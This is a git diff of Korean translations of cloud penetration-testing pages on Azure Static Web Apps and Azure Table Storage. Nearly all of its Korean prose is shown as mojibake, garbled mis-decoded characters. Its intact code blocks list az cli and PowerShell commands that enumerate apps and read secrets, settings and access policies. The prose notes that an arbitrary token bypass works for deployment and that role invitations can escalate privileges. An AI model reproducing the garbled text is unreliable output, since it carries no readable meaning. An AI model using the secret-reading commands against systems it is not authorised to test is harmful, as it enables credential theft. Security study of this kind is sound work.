€์žฅ๋ฉ๋‹ˆ๋‹ค**. ๊ทธ๋Ÿฌ๋‚˜ ์ด Github Action์€ **`actions/github-script@v6`** ์•ก์…˜์„ ์‚ฌ์šฉํ•˜์—ฌ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์˜ IDToken์„ ๊ฐ€์ ธ์˜ค๊ณ  ์ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์•ฑ์„ ๋ฐฐํฌํ•˜๋Š” ์ฐจ์ด์ ์ด ์žˆ์Šต๋‹ˆ๋‹ค. -- ๋‘ ๊ฒฝ์šฐ ๋ชจ๋‘ **`Azure/static-web-apps-deploy@v1`** ์•ก์…˜์ด `azure_static_web_apps_api_token` ๋งค๊ฐœ๋ณ€์ˆ˜์— ์žˆ๋Š” ํ† ํฐ๊ณผ ํ•จ๊ป˜ ์‚ฌ์šฉ๋˜์ง€๋งŒ, ๋‘ ๋ฒˆ์งธ ๊ฒฝ์šฐ์—๋Š” `github_id_token` ๋งค๊ฐœ๋ณ€์ˆ˜์˜ IDToken์œผ๋กœ ์ธ์ฆ์ด ์ด๋ฃจ์–ด์ง€๋ฏ€๋กœ `12345cbb198a77a092ff885781a62a15d51ef5e3654ca11234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345`์™€ ๊ฐ™์€ ์œ ํšจํ•œ ํ˜•์‹์˜ ์ž„์˜ ํ† ํฐ๋งŒ์œผ๋กœ๋„ ์•ฑ์„ ๋ฐฐํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +- **๋ฐฐํฌ ํ† ํฐ**: ํ† ํฐ์ด ์ƒ์„ฑ๋˜์–ด ๋ฐฐํฌ ํ”„๋กœ์„ธ์Šค๋ฅผ ์ธ์ฆํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. **์ด ํ† ํฐ๋งŒ ์žˆ์œผ๋ฉด ์•ฑ์˜ ์ƒˆ ๋ฒ„์ „์„ ๋ฐฐํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ๋ฆฌํฌ์ง€ํ† ๋ฆฌ๊ฐ€ ์—…๋ฐ์ดํŠธ๋  ๋•Œ๋งˆ๋‹ค ์•ฑ์˜ ์ƒˆ ๋ฒ„์ „์„ ๋ฐฐํฌํ•˜๊ธฐ ์œ„ํ•ด ๋น„๋ฐ€์— ํ† ํฐ์ด ํฌํ•จ๋œ **Github Action์ด ์ž๋™์œผ๋กœ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— ๋ฐฐํฌ๋ฉ๋‹ˆ๋‹ค**. +- **GitHub Actions ์›Œํฌํ”Œ๋กœ์šฐ**: ์ด ๊ฒฝ์šฐ ๋งค์šฐ ์œ ์‚ฌํ•œ Github Action์ด ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— ๋ฐฐํฌ๋˜๋ฉฐ **ํ† ํฐ๋„ ๋น„๋ฐ€์— ์ €์žฅ๋ฉ๋‹ˆ๋‹ค**. ๊ทธ๋Ÿฌ๋‚˜ ์ด Github Action์€ ์ฐจ์ด๊ฐ€ ์žˆ์œผ๋ฉฐ, **`actions/github-script@v6`** ์•ก์…˜์„ ์‚ฌ์šฉํ•˜์—ฌ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์˜ IDToken์„ ๊ฐ€์ ธ์˜ค๊ณ  ์ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์•ฑ์„ ๋ฐฐํฌํ•ฉ๋‹ˆ๋‹ค. +- ๋‘ ๊ฒฝ์šฐ ๋ชจ๋‘ **`Azure/static-web-apps-deploy@v1`** ์•ก์…˜์ด `azure_static_web_apps_api_token` ๋งค๊ฐœ๋ณ€์ˆ˜์— ์žˆ๋Š” ํ† ํฐ๊ณผ ํ•จ๊ป˜ ์‚ฌ์šฉ๋˜์ง€๋งŒ, ๋‘ ๋ฒˆ์งธ ๊ฒฝ์šฐ์—๋Š” `github_id_token` ๋งค๊ฐœ๋ณ€์ˆ˜์˜ IDToken์œผ๋กœ ์ธ์ฆ์ด ์ด๋ฃจ์–ด์ง€๋ฏ€๋กœ `12345cbb198a77a092ff885781a62a15d51ef5e3654ca11234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345`์™€ ๊ฐ™์€ ์œ ํšจํ•œ ํ˜•์‹์˜ ์ž„์˜์˜ ํ† ํฐ๋งŒ์œผ๋กœ๋„ ์•ฑ์„ ๋ฐฐํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ### Web App Basic Authentication @@ -62,20 +62,24 @@ az rest --method GET \ } } ``` -๊ฒฝ๋กœ๋ฅผ **์—ญํ• ๋กœ ๋ณดํ˜ธ**ํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐฉ๋ฒ•์— ์œ ์˜ํ•˜์„ธ์š”. ๊ทธ๋Ÿฌ๋ฉด ์‚ฌ์šฉ์ž๋Š” ์•ฑ์— ์ธ์ฆํ•˜๊ณ  ํ•ด๋‹น ์—ญํ• ์„ ๋ถ€์—ฌ๋ฐ›์•„์•ผ ๊ฒฝ๋กœ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ, **์ดˆ๋Œ€์žฅ์„ ์ƒ์„ฑ**ํ•˜์—ฌ EntraID, Facebook, GitHub, Google, Twitter๋ฅผ ํ†ตํ•ด ๋กœ๊ทธ์ธํ•˜๋Š” ํŠน์ • ์‚ฌ์šฉ์ž์—๊ฒŒ ํŠน์ • ์—ญํ• ์„ ๋ถ€์—ฌํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ์•ฑ ๋‚ด์—์„œ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ค๋Š” ๋ฐ ์œ ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +๋…ธํŠธ: **์—ญํ• ๋กœ ๊ฒฝ๋กœ๋ฅผ ๋ณดํ˜ธํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ**ํ•˜๋‹ค๋Š” ์ ์— ์œ ์˜ํ•˜์„ธ์š”. ๊ทธ๋Ÿฌ๋ฉด ์‚ฌ์šฉ์ž๋Š” ์•ฑ์— ์ธ์ฆํ•˜๊ณ  ํ•ด๋‹น ์—ญํ• ์„ ๋ถ€์—ฌ๋ฐ›์•„์•ผ ๊ฒฝ๋กœ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ, **์ดˆ๋Œ€์žฅ์„ ์ƒ์„ฑํ•˜์—ฌ ํŠน์ • ์‚ฌ์šฉ์ž์—๊ฒŒ ํŠน์ • ์—ญํ• ์„ ๋ถ€์—ฌ**ํ•˜๋Š” ๊ฒƒ๋„ ๊ฐ€๋Šฅํ•˜๋ฉฐ, ์ด๋Š” EntraID, Facebook, GitHub, Google, Twitter๋ฅผ ํ†ตํ•ด ๋กœ๊ทธ์ธํ•˜๋Š” ์‚ฌ์šฉ์ž์—๊ฒŒ ์œ ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด ์•ฑ ๋‚ด์—์„œ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. > [!TIP] -> `staticwebapp.config.json` ํŒŒ์ผ์— ๋Œ€ํ•œ **๋ณ€๊ฒฝ ์‚ฌํ•ญ์ด ์ˆ˜์šฉ๋˜์ง€ ์•Š๋„๋ก ์•ฑ์„ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ์ด ๊ฒฝ์šฐ, ๋‹จ์ˆœํžˆ Github์—์„œ ํŒŒ์ผ์„ ๋ณ€๊ฒฝํ•˜๋Š” ๊ฒƒ๋งŒ์œผ๋กœ๋Š” ์ถฉ๋ถ„ํ•˜์ง€ ์•Š์„ ์ˆ˜ ์žˆ์œผ๋ฉฐ, **์•ฑ์˜ ์„ค์ •์„ ๋ณ€๊ฒฝํ•ด์•ผ ํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค**. +> ์•ฑ์„ ๊ตฌ์„ฑํ•˜์—ฌ **`staticwebapp.config.json`** ํŒŒ์ผ์— ๋Œ€ํ•œ ๋ณ€๊ฒฝ ์‚ฌํ•ญ์ด ์ˆ˜์šฉ๋˜์ง€ ์•Š๋„๋ก ์„ค์ •ํ•  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์— ์œ ์˜ํ•˜์„ธ์š”. ์ด ๊ฒฝ์šฐ, ๋‹จ์ˆœํžˆ Github์—์„œ ํŒŒ์ผ์„ ๋ณ€๊ฒฝํ•˜๋Š” ๊ฒƒ๋งŒ์œผ๋กœ๋Š” ์ถฉ๋ถ„ํ•˜์ง€ ์•Š์„ ์ˆ˜ ์žˆ์œผ๋ฉฐ, **์•ฑ์˜ ์„ค์ •์„ ๋ณ€๊ฒฝํ•ด์•ผ ํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค**. ์Šคํ…Œ์ด์ง• URL์€ ๋‹ค์Œ ํ˜•์‹์„ ๊ฐ€์ง‘๋‹ˆ๋‹ค: `https://-..` ์˜ˆ: `https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net` ### ๊ด€๋ฆฌํ˜• ID -Azure Static Web Apps๋Š” **๊ด€๋ฆฌํ˜• ID**๋ฅผ ์‚ฌ์šฉํ•˜๋„๋ก ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์ง€๋งŒ, [์ด FAQ](https://learn.microsoft.com/en-gb/azure/static-web-apps/faq#does-static-web-apps-support-managed-identity-)์—์„œ ์–ธ๊ธ‰ํ–ˆ๋“ฏ์ด ์ธ์ฆ ๋ชฉ์ ์œผ๋กœ Azure Key Vault์—์„œ ๋น„๋ฐ€์„ **์ถ”์ถœํ•˜๋Š” ๊ฒƒ๋งŒ ์ง€์›๋˜๋ฉฐ, ๋‹ค๋ฅธ Azure ๋ฆฌ์†Œ์Šค์— ์ ‘๊ทผํ•˜๋Š” ๊ฒƒ์€ ์ง€์›๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค**. +Azure Static Web Apps๋Š” **๊ด€๋ฆฌํ˜• ID**๋ฅผ ์‚ฌ์šฉํ•˜๋„๋ก ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์ง€๋งŒ, [์ด FAQ](https://learn.microsoft.com/en-gb/azure/static-web-apps/faq#does-static-web-apps-support-managed-identity-)์—์„œ ์–ธ๊ธ‰ํ–ˆ๋“ฏ์ด, ์ธ์ฆ ๋ชฉ์ ์œผ๋กœ Azure Key Vault์—์„œ ๋น„๋ฐ€์„ **์ถ”์ถœํ•˜๋Š” ๊ฒƒ๋งŒ ์ง€์›**๋˜๋ฉฐ, ๋‹ค๋ฅธ Azure ๋ฆฌ์†Œ์Šค์— ์ ‘๊ทผํ•˜๋Š” ๊ฒƒ์€ ์ง€์›๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ์ž์„ธํ•œ ๋‚ด์šฉ์€ https://learn.microsoft.com/en-us/azure/static-web-apps/key-vault-secrets์—์„œ Azure ๊ฐ€์ด๋“œ๋ฅผ ์ฐธ์กฐํ•˜์—ฌ ์ •์  ์•ฑ์—์„œ ๊ธˆ๊ณ  ๋น„๋ฐ€์„ ์‚ฌ์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ## ์—ด๊ฑฐ + +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} ```bash # List Static Webapps az staticwebapp list --output table @@ -107,13 +111,66 @@ az rest --method POST \ # Check connected backends az staticwebapp backends show --name --resource-group ``` -## ์›น ์•ฑ ์ƒ์„ฑ ์˜ˆ์ œ +{% endcode %} +{% endtab %} -๋‹ค์Œ ๋งํฌ์—์„œ ์›น ์•ฑ์„ ์ƒ์„ฑํ•˜๋Š” ์ข‹์€ ์˜ˆ์ œ๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: [https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github](https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github) +{% tab title="Az PowerShell" %} +{% code overflow="wrap" %} +```powershell +Get-Command -Module Az.Websites + +# Retrieves details of a specific Static Web App in the specified resource group. +Get-AzStaticWebApp -ResourceGroupName -Name + +# Retrieves the build details for a specific Static Web App. +Get-AzStaticWebAppBuild -ResourceGroupName -Name + +# Retrieves the application settings for a specific build environment in a Static Web App. +Get-AzStaticWebAppBuildAppSetting -ResourceGroupName -Name -EnvironmentName + +# Retrieves functions for a specific build environment in a Static Web App. +Get-AzStaticWebAppBuildFunction -ResourceGroupName -Name -EnvironmentName + +# Retrieves function app settings for a specific build environment in a Static Web App. +Get-AzStaticWebAppBuildFunctionAppSetting -ResourceGroupName -Name -EnvironmentName + +# Retrieves the configured roles for a Static Web App. +Get-AzStaticWebAppConfiguredRole -ResourceGroupName -Name + +# Retrieves the custom domains configured for a Static Web App. +Get-AzStaticWebAppCustomDomain -ResourceGroupName -Name + +# Retrieves details of the functions associated with a Static Web App. +Get-AzStaticWebAppFunction -ResourceGroupName -Name + +# Retrieves the app settings for the function app associated with a Static Web App. +Get-AzStaticWebAppFunctionAppSetting -ResourceGroupName -Name + +# Retrieves the secrets for a Static Web App. +Get-AzStaticWebAppSecret -ResourceGroupName -Name + +# Retrieves general app settings for a Static Web App. +Get-AzStaticWebAppSetting -ResourceGroupName -Name + +# Retrieves user details for a Static Web App with a specified authentication provider. +Get-AzStaticWebAppUser -ResourceGroupName -Name -AuthProvider + +# Retrieves user-provided function apps associated with a Static Web App. +Get-AzStaticWebAppUserProvidedFunctionApp -ResourceGroupName -Name + +``` +{% endcode %} +{% endtab %} +{% endtabs %} + + +## ์›น ์•ฑ ์ƒ์„ฑ ์˜ˆ์‹œ + +๋‹ค์Œ ๋งํฌ์—์„œ ์›น ์•ฑ์„ ์ƒ์„ฑํ•˜๋Š” ์ข‹์€ ์˜ˆ์‹œ๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: [https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github](https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github) 1. https://github.com/staticwebdev/react-basic/generate ๋ฆฌํฌ์ง€ํ† ๋ฆฌ๋ฅผ ํฌํฌํ•˜์—ฌ GitHub ๊ณ„์ •์— `my-first-static-web-app`์ด๋ผ๋Š” ์ด๋ฆ„์œผ๋กœ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. -2. Azure ํฌํ„ธ์—์„œ GitHub ์•ก์„ธ์Šค๋ฅผ ๊ตฌ์„ฑํ•˜๊ณ  ์ด์ „์— ํฌํฌํ•œ ์ƒˆ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ๋ฅผ ์„ ํƒํ•˜์—ฌ Static Web App์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. -3. ์ƒ์„ฑํ•œ ํ›„ ๋ช‡ ๋ถ„ ๊ธฐ๋‹ค๋ฆฌ๊ณ  ์ƒˆ ํŽ˜์ด์ง€๋ฅผ ํ™•์ธํ•˜์„ธ์š”! +2. Azure ํฌํ„ธ์—์„œ GitHub ์ ‘๊ทผ์„ ๊ตฌ์„ฑํ•˜๊ณ  ์ด์ „์— ํฌํฌํ•œ ์ƒˆ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ๋ฅผ ์„ ํƒํ•˜์—ฌ Static Web App์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. +3. ์ƒ์„ฑํ•œ ํ›„ ๋ช‡ ๋ถ„ ๊ธฐ๋‹ค๋ฆฌ๊ณ , ์ƒˆ ํŽ˜์ด์ง€๋ฅผ ํ™•์ธํ•˜์„ธ์š”! ## ๊ถŒํ•œ ์ƒ์Šน ๋ฐ ํฌ์ŠคํŠธ ์ต์Šคํ”Œ๋กœ์ž‡ diff --git a/src/pentesting-cloud/azure-security/az-services/az-table-storage.md b/src/pentesting-cloud/azure-security/az-services/az-table-storage.md index 575de5fce..406274946 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-table-storage.md +++ b/src/pentesting-cloud/azure-security/az-services/az-table-storage.md @@ -6,23 +6,23 @@ **Azure Table Storage**๋Š” ๋Œ€๋Ÿ‰์˜ ๊ตฌ์กฐํ™”๋œ ๋น„๊ด€๊ณ„ํ˜• ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•˜๊ธฐ ์œ„ํ•ด ์„ค๊ณ„๋œ NoSQL ํ‚ค-๊ฐ’ ์ €์žฅ์†Œ์ž…๋‹ˆ๋‹ค. ๋†’์€ ๊ฐ€์šฉ์„ฑ, ๋‚ฎ์€ ๋Œ€๊ธฐ ์‹œ๊ฐ„ ๋ฐ ๋Œ€๊ทœ๋ชจ ๋ฐ์ดํ„ฐ ์„ธํŠธ๋ฅผ ํšจ์œจ์ ์œผ๋กœ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๋Š” ํ™•์žฅ์„ฑ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ๋ฐ์ดํ„ฐ๋Š” ํ…Œ์ด๋ธ”๋กœ ๊ตฌ์„ฑ๋˜๋ฉฐ, ๊ฐ ์—”ํ„ฐํ‹ฐ๋Š” ํŒŒํ‹ฐ์…˜ ํ‚ค์™€ ํ–‰ ํ‚ค๋กœ ์‹๋ณ„๋˜์–ด ๋น ๋ฅธ ์กฐํšŒ๋ฅผ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ๋ฐ์ดํ„ฐ๋Š” ์•ˆ์ „ํ•˜๊ณ  ๊ด€๋ฆฌ๋˜๋Š” ์ €์žฅ์†Œ๋ฅผ ์œ„ํ•ด ์•”ํ˜ธํ™”, ์—ญํ•  ๊ธฐ๋ฐ˜ ์•ก์„ธ์Šค ์ œ์–ด ๋ฐ ๊ณต์œ  ์•ก์„ธ์Šค ์„œ๋ช…๊ณผ ๊ฐ™์€ ๊ธฐ๋Šฅ์„ ์ง€์›ํ•˜์—ฌ ๋‹ค์–‘ํ•œ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์— ์ ํ•ฉํ•ฉ๋‹ˆ๋‹ค. -ํ…Œ์ด๋ธ” ์ €์žฅ์†Œ์— ๋Œ€ํ•œ **๋‚ด์žฅ ๋ฐฑ์—… ๋ฉ”์ปค๋‹ˆ์ฆ˜์€ ์—†์Šต๋‹ˆ๋‹ค**. +ํ…Œ์ด๋ธ” ์ €์žฅ์†Œ์— **๋‚ด์žฅ๋œ ๋ฐฑ์—… ๋ฉ”์ปค๋‹ˆ์ฆ˜์ด ์—†์Šต๋‹ˆ๋‹ค**. ### ํ‚ค #### **PartitionKey** - **PartitionKey๋Š” ์—”ํ„ฐํ‹ฐ๋ฅผ ๋…ผ๋ฆฌ์  ํŒŒํ‹ฐ์…˜์œผ๋กœ ๊ทธ๋ฃนํ™”ํ•ฉ๋‹ˆ๋‹ค**. ๋™์ผํ•œ PartitionKey๋ฅผ ๊ฐ€์ง„ ์—”ํ„ฐํ‹ฐ๋Š” ํ•จ๊ป˜ ์ €์žฅ๋˜์–ด ์ฟผ๋ฆฌ ์„ฑ๋Šฅ๊ณผ ํ™•์žฅ์„ฑ์„ ํ–ฅ์ƒ์‹œํ‚ต๋‹ˆ๋‹ค. -- ์˜ˆ: ์ง์› ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•˜๋Š” ํ…Œ์ด๋ธ”์—์„œ `PartitionKey`๋Š” ๋ถ€์„œ๋ฅผ ๋‚˜ํƒ€๋‚ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค, ์˜ˆ๋ฅผ ๋“ค์–ด `"HR"` ๋˜๋Š” `"IT"`. +- ์˜ˆ: ์ง์› ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•˜๋Š” ํ…Œ์ด๋ธ”์—์„œ `PartitionKey`๋Š” ๋ถ€์„œ๋ฅผ ๋‚˜ํƒ€๋‚ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค, ์˜ˆ๋ฅผ ๋“ค์–ด, `"HR"` ๋˜๋Š” `"IT"`. #### **RowKey** - **RowKey๋Š” ํŒŒํ‹ฐ์…˜ ๋‚ด์—์„œ ์—”ํ„ฐํ‹ฐ์˜ ๊ณ ์œ  ์‹๋ณ„์ž์ž…๋‹ˆ๋‹ค**. PartitionKey์™€ ๊ฒฐํ•ฉ๋  ๋•Œ, ํ…Œ์ด๋ธ”์˜ ๊ฐ ์—”ํ„ฐํ‹ฐ๊ฐ€ ์ „ ์„ธ๊ณ„์ ์œผ๋กœ ๊ณ ์œ ํ•œ ์‹๋ณ„์ž๋ฅผ ๊ฐ–๋„๋ก ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค. -- ์˜ˆ: `"HR"` ํŒŒํ‹ฐ์…˜์˜ ๊ฒฝ์šฐ, `RowKey`๋Š” ์ง์› ID์ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค, ์˜ˆ๋ฅผ ๋“ค์–ด `"12345"`. +- ์˜ˆ: `"HR"` ํŒŒํ‹ฐ์…˜์˜ ๊ฒฝ์šฐ, `RowKey`๋Š” ์ง์› ID์ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค, ์˜ˆ๋ฅผ ๋“ค์–ด, `"12345"`. #### **๊ธฐํƒ€ ์†์„ฑ (์‚ฌ์šฉ์ž ์ •์˜ ์†์„ฑ)** -- PartitionKey์™€ RowKey ์™ธ์—๋„ ์—”ํ„ฐํ‹ฐ๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•˜๊ธฐ ์œ„ํ•œ ์ถ”๊ฐ€ **์‚ฌ์šฉ์ž ์ •์˜ ์†์„ฑ์„ ๊ฐ€์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ์ด๋Š” ์‚ฌ์šฉ์ž ์ •์˜์ด๋ฉฐ ์ „ํ†ต์ ์ธ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์˜ ์—ด์ฒ˜๋Ÿผ ์ž‘์šฉํ•ฉ๋‹ˆ๋‹ค. +- PartitionKey์™€ RowKey ์™ธ์—๋„, ์—”ํ„ฐํ‹ฐ๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•˜๊ธฐ ์œ„ํ•œ ์ถ”๊ฐ€ **์‚ฌ์šฉ์ž ์ •์˜ ์†์„ฑ์„ ๊ฐ€์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ์ด๋Š” ์‚ฌ์šฉ์ž ์ •์˜์ด๋ฉฐ ์ „ํ†ต์ ์ธ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์˜ ์—ด์ฒ˜๋Ÿผ ์ž‘์šฉํ•ฉ๋‹ˆ๋‹ค. - ์†์„ฑ์€ **ํ‚ค-๊ฐ’ ์Œ**์œผ๋กœ ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. - ์˜ˆ: `Name`, `Age`, `Title`์€ ์ง์›์— ๋Œ€ํ•œ ์‚ฌ์šฉ์ž ์ •์˜ ์†์„ฑ์ด ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. @@ -69,6 +69,8 @@ Get-AzStorageAccount # List tables Get-AzStorageTable -Context (Get-AzStorageAccount -Name -ResourceGroupName ).Context + +Get-AzStorageTableStoredAccessPolicy -Table -Context (Get-AzStorageAccount -Name ).Context ``` {{#endtab}} {{#endtabs}} @@ -78,11 +80,11 @@ Get-AzStorageTable -Context (Get-AzStorageAccount -Name -Reso > [!TIP] > ์‚ฌ์šฉํ•  ๊ณ„์ • ํ‚ค๋ฅผ ๋‚˜ํƒ€๋‚ด๋ ค๋ฉด `--account-key` ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค.\ -> SAS ํ† ํฐ์„ ์‚ฌ์šฉํ•˜์—ฌ ์•ก์„ธ์Šคํ•˜๋ ค๋ฉด SAS ํ† ํฐ๊ณผ ํ•จ๊ป˜ `--sas-token` ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค. +> SAS ํ† ํฐ์„ ํ†ตํ•ด ์•ก์„ธ์Šคํ•˜๋ ค๋ฉด SAS ํ† ํฐ๊ณผ ํ•จ๊ป˜ `--sas-token` ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค. ## Privilege Escalation -์ €์žฅ์†Œ ๊ถŒํ•œ ์ƒ์Šน๊ณผ ๋™์ผํ•ฉ๋‹ˆ๋‹ค: +์ €์žฅ์†Œ privesc์™€ ๋™์ผํ•ฉ๋‹ˆ๋‹ค: {{#ref}} ../az-privilege-escalation/az-storage-privesc.md